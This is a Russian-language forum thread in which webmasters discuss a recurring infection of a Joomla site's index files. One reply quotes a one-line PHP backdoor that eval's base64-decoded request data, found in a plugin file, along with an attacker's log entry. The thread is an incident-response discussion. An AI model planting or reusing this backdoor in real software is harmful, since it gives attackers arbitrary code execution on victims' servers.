Загадочный вирус на сайте

(Ответов: 5, Просмотров: 1545)
  1. Студент
    • Регистрация: 12.01.2010
    • Сообщений: 42
    • Репутация: 16
    Добрый день коллеги, вчера столкнулся с вирусом на сайте. Вирус изменяет файлы с именами index.php и index.html и при этом дата изменения файла не меняется. В начале файла дописывается код следующего содержания:

    Изменение пароля от Cpanel, FTP, Mysql положительного результата не принесло, вирус снова появляется по пришествию некоторого не продолжительного времени. Компьютер на вирусы проверялся все чисто, так же прибывал чистить с другого компьютера, вирус все равно возвращается, cайт работает на Joomla 1.7.3.

    Кто сталкивался с аналогичным вирусом, если не трудно поделитесь информацией, как была решена данная проблема.
    Последний раз редактировалось Zvеr; 15.03.2012 в 20:46.
    • 0
  2. Опытный Аватар для G00D
    • Регистрация: 02.02.2012
    • Сообщений: 284
    • Репутация: 76
    проверяйте файлы на хостинге на наличие shell'a
    • 0
  3. Banned
    • Регистрация: 03.03.2012
    • Сообщений: 163
    • Репутация: 11
    а проверка яндекса на вредоносный код ничего не дает? проверь, может чего найдет
    • 0
  4. Студент
    • Регистрация: 12.01.2010
    • Сообщений: 42
    • Репутация: 16
    furian,да яндекс находил вредоносный код. Но только зараженные файлы index.php и index.html

    Изучение логов дало такой результат.

    По данному адресу /modules/mod_tools_pack/mod_tools_pack.php отправлялся POST запрос, что именно в нем было не знаю но файл содержал всего одно строку:

    PHP код:
    $_REQUEST[e] ? eVAl( base64_decode$_REQUEST[e] ) ) : exit; 
    Ответ нашелся быстро - http://www.dataprotectioncenter.com/...lspack-plugin/

    Если перевести и выделить главное то - это бэкдор, который позволяет атакующему выполнить любой код на вашем сайте.

    Самое интересное что это гадость используется на Wordpress, как он попало в Joomla это вопрос.

    Обращение к серверу выглядит вот так:

    83.69.224.216 - - [14/Mar/2012:06:05:40 -0400] "POST /modules/mod_tools_pack/mod_tools_pack.php HTTP/1.0" 200 1 "-" "Mozilla/4.76 [en] (Win98; U)"
    Последний раз редактировалось voffka_m; 14.03.2012 в 20:30.
    • 0
  5. Студент
    • Регистрация: 15.12.2009
    • Сообщений: 34
    • Репутация: 15
    появился подобный код на одном из vds 6.03.12 , источник взлома - установленный wordpress 3.1 без обновлений с ноября прошлого года. В подробности пока не вникал, сохранил логи.
    месяца 2 назад была история про похожий вирус на хабре.
    • 0
  6. Software Engineer Аватар для Zvеr
    • Регистрация: 07.02.2010
    • Сообщений: 603
    • Репутация: 228
    • Webmoney BL: ?
    Удалил код из первого поста.
    • 0

Похожие темы

Темы Раздел Ответов Последний пост
Вирус на сайте joomla
Web программирование 4 15.02.2012 23:20
Как я искал вирус на сайте
Дайджест блогосферы 5 14.02.2012 23:27
Ребят помогите. Вирус на сайте
Прочее 0 06.02.2011 04:36
Вирус на сайте
Софт, скрипты, сервисы 27 15.02.2010 21:41

У кого попросить инвайт?

Вы можете попросить инвайт у любого модератора:

Информеры